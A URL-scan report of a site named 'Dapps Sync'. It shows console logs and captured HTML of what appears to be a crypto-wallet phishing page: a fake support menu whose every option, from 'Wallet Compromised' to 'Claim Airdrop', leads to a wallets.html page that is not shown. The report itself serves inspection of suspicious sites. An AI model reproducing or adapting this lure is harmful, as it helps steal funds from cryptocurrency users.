https://synchronizationdapp.web.app/

ID de exploración:
313e74e3-1fcc-4017-a9d3-0d070cc39f5eFinalizado
URL enviada:
https://synchronizationdapp.web.app/
Informe finalizado:

Enlaces: 0 encontrados

Variables JavaScript: 7 encontradas

NombreTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
webpackHotUpdatefunction
__core-js_shared__object
coreobject
__VUE_HOT_MAP__object

Mensajes de registro de la consola: 7 encontrados

TipoCategoríaRegistro
warningother
URL
webpack-internal:///./src/components/mixins/deprecated.js
Texto
[CoingeckoCoinPriceMarqueeWidget] This widget is deprecated and is no longer maintained. Please visit https://www.coingecko.com/widgets to get the new version of this widget, which features a new design and better performance!
infoother
URL
webpack-internal:///./node_modules/vue/dist/vue.runtime.esm.js
Texto
Download the Vue Devtools extension for a better development experience: https://github.com/vuejs/vue-devtools
infoother
URL
webpack-internal:///./node_modules/vue/dist/vue.runtime.esm.js
Texto
You are running Vue in development mode. Make sure to turn on production mode when deploying for production. See more tips at https://vuejs.org/guide/deployment.html
errornetwork
URL
https://synchronizationdapp.web.app/images/coinlist.webp
Texto
Failed to load resource: the server responded with a status of 404 ()
errorother
URL
webpack-internal:///./node_modules/vue/dist/vue.runtime.esm.js
Texto
[Vue warn]: Error in render: "TypeError: Cannot read properties of undefined (reading 'id')" found in ---> <CoingeckoCoinPriceMarqueeWidget> at src/components/CoingeckoCoinPriceMarqueeWidget.vue <Root>
errorjavascript
URL
webpack-internal:///./node_modules/vue/dist/vue.runtime.esm.js
Texto
JSHandle@error
errornetwork
URL
https://synchronizationdapp.web.app/favicon.ico
Texto
Failed to load resource: the server responded with a status of 404 ()

HTML

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SYNCDAPPNODE</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="font-awesome-4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/brands.min.css" integrity="sha512-9YHSK59/rjvhtDcY/b+4rdnl0V4LPDWdkKceBl8ZLF5TB6745ml1AfluEU6dFWqwDw9lPvnauxFgpKvJqp7jiQ==" crossorigin="anonymous" referrerpolicy="no-referrer">
  </head>

  <body>
    <div class="header">
      <coingecko-coin-price-marquee-widget coin-ids="bitcoin,eos,ethereum,litecoin,ripple,crypto-com-chain,binancecoin,busdx,dogecoin" currency="usd" background-color="#ffffff" locale="en" vce-ready=""></coingecko-coin-price-marquee-widget>
    </div>

    <div class="hero">
      <h1>Dapps Sync</h1>
      <h2>The Best Cryptocurrency Synchronization Platform</h2>
      <h3>
        Join over 2 million+ crypto users using dApps sync <br>
        for wallet synchronization via iOS or android mobile deep linking
      </h3>
    </div>

    <!-- second -->
    <div class="second">
      <h1>Kindly select the issue you have from the list below</h1>
      <h2>Which of these options below is related to your issue?</h2>
    </div>
    <div class="containers">
      <div class="cont">
        <i class="fa fa-server"></i>
        <h1>Claim Reward</h1>
        <h2>
          Having issues with claiming rewards your wallet / app?. Click on the
          button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>

      <div class="cont">
        <i class="fa fa-exchange"></i>
        <h1>Synchronization</h1>
        <h2>
          Having issues with synchronizing your wallet / app?. Click on the
          button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-cogs"></i>
        <h1>Withdrawal</h1>
        <h2>
          Having issues with withdrawing on your wallet / app?. Click on the
          button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-cogs"></i>
        <h1>Validation</h1>
        <h2>
          Having issues with validating your wallet / app?. Click on the button
          below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-sign-in"></i>
        <h1>Login issues</h1>
        <h2>
          Having issues with logging into your wallet / app?. Click on the
          button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-bolt"></i>
        <h1>Rectification</h1>
        <h2>
          Having issues with rectifying your wallet / app?. Click on the button
          below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-server"></i>
        <h1>Generate QR codes</h1>
        <h2>
          Do you intend to generate QR code for your wallet / app?. Click on the
          button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-link"></i>
        <h1>Connect to dApps</h1>
        <h2>
          Unable to connect to dApps in your wallet?. Do click on the buton
          below
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-bolt"></i>
        <h1>General Issues</h1>
        <h2>
          Having general issues in your wallet / app?. Click on the button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-exchange"></i>
        <h1>Swap or Exchange</h1>
        <h2>
          Having any issues with swap or exchange of cryptos?. Click on the
          button below to fix that
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>

      <div class="cont">
        <i class="fa fa-line-chart"></i>
        <h1>Authentication issues</h1>
        <h2>
          Kindly click on the button below to lower the transaction fee to make
          a transaction
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>

      <div class="cont">
        <i class="fa fa-sign-in"></i>
        <h1>Claim Airdrop</h1>
        <h2>Click on the button below</h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-credit-card"></i>
        <h1>Staking / Unstaking issues</h1>
        <h2>
          Click on the button below if you are unable to stake / unstake in your
          wallet / app
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <!-- <div class="cont">
            <i class="fa fa-bolt"></i>
            <h1>Authentication issues</h1>
            <h2>Click on the button below if you are unable to set-up or have any issues with 2-Factor Authentication
            </h2>
            <br>
            <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>

        </div> -->
      <div class="cont">
        <i class="fa fa-server"></i>
        <h1>Connect to mainnets server</h1>
        <h2>
          To connect to the mainnets server on the network chain, click on the
          buton below to proceed
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-cogs"></i>
        <h1>Migration</h1>
        <h2>
          If you are unable to migrate between networks in your wallet / app,
          click on the button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-exclamation-triangle"></i>
        <h1>KYC/Whitelist</h1>
        <h2>Having issues with KYC / Whitelist. Click on the button below</h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>

      <div class="cont">
        <i class="fa fa-credit-card"></i>
        <h1>Slippage</h1>
        <h2>
          Click on the button below if you have slippage issues in your wallet /
          app
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-bolt"></i>
        <h1>Reset Wallet Password</h1>
        <h2>
          Having issues with reseting password in your wallet / app?. Click on
          the button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-sign-in"></i>
        <h1>NFTs/Minting</h1>
        <h2>
          Having issues with NFT/Minting into your wallet / app?. Click on the
          button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>

      <div class="cont">
        <i class="fa fa-exclamation-triangle"></i>
        <h1>Pool &amp; Farm Access</h1>
        <h2>Click on the button below</h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-server"></i>
        <h1>Unable to Purchase Coins</h1>
        <h2>
          Unable to purchase coins on your wallet? click on the buton below to
          proceed
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>

      <div class="cont">
        <i class="fa fa-credit-card"></i>
        <h1>Wallet Compromised</h1>
        <h2>Click on the button below if your wallet is compromised</h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-server"></i>
        <h1>Missing Funds/irregular Balance</h1>
        <h2>
          Did you notice missing funds or irregular balance onn your wallet?,
          click on the buton below to proceed
        </h2>
        <br>
        <a href="wallets.html">PROCEED <i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
      <div class="cont">
        <i class="fa fa-exclamation-triangle"></i>
        <h1>Buy coins/Tokens</h1>
        <h2>
          Do you wish to buy coins or token on your wallet or you have any
          related issue? Click on the button below
        </h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>

      <div class="cont">
        <i class="fa fa-server"></i>
        <h1>Bridge Transfer</h1>
        <h2>Click on the button below</h2>
        <br>
        <a href="wallets.html">PROCEED<i class="fa fa-arrow-right" id="arr"></i></a>
      </div>
    </div>

    <!-- <div class="sicons">
        <i class="fa fa-telegram"></i>
        <i class="fa fa-github"></i>
        <i class="fa fa-twitter"></i>
        <i class="fa fa-facebook"></i>
    </div> -->

    <div class="footer">
      <h2>Terms &amp; Conditions</h2>
      <h2>Privacy Policy</h2>
    </div>

    <script src="https://widgets.coingecko.com/coingecko-coin-price-marquee-widget.js"></script>
  

</body></html>